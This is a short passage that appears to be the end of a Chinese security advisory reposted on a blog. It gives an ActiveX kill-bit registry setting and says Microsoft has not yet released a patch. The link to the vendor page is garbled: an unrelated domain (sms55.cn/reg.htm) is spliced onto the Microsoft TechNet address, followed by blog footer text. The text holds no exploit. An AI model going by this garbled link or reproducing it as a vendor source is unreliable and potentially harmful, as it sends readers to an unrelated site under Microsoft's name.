"Compatibility Flags"=dword:00000400

厂商补丁:

Microsoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.sms55.cn/reg.htm谢谢支持www.microsoft.com/technet/security/



类别: 无分类 |  评论(0) |  浏览(3719) |  收藏
« 1 23» Pages: ( 1/3 total )